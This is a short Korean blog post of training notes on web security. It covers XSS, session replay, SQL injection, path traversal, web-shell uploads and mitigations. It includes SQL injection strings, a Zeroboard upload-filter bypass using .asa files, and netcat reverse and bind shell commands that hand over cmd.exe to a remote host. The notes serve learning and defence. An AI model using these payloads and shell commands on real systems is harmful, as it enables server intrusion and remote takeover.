공장이야기/정보보호

웹보안 교육

창신다이 2008. 12. 11. 15:12
1. XSS
   글쓰기 할 때, 게시물에 스크립트 작성
   대응: 문자열 대체
   ex) 열람자의 쿠키값 전송

2. 인증 및 세션관리 replay attack
    쿠키값으로 해당 사용자로 로그인.
    버퍼플러쉬. http 헤더 조작
    대응: 쿠키값 암호화

3. SQL Injection
    [' or 1 = 1 --] select 쿼리문에 대해서 true 리턴
    [' or 1 = (@@version) --]
    대웅: XSS와 유사

4. File Download
    상대경로로 접근해서 시스템 폴더 ACCESS

5. File Upload
    web 쉘

* NCSC 국정원 (국각사이버안전센터)
   - URL http://www.ncsc.go.kr/
   - USB해킹방지
   - 문서암호화

* 제로보드 취약점 공격
  ① File Upload
      - 제로보드에서 .asp 필터링하지만, .asa 필터링 안함
      - /bbs/data/free/shell.txt
      - WebAdmin 2.x
  ② 리버스텔넷
      (넷캐쉬)파이프라인 프로그램
       nc.exe
  ③ 파이프 통신 nc -l -p 9098
      클라이언트)
      nc IP 9098 -e "c:\cmd.exe 경로"
      아웃바운드 리버스 커넥션
  ④ 서버측에서 직접 얻기    
      서버 nc -l -p 9098 -e "cmd경로"
      클라이언트)
      nc 서버IP 9098 (서버 시스템쉘 획득)
   ⑤ char(76)
        ascii코드값을 캐릭터로 변환

* 보안대책
   - 실행폴더 권한 없애기
   - 업로드폴더를 웹폴더 밖에 두기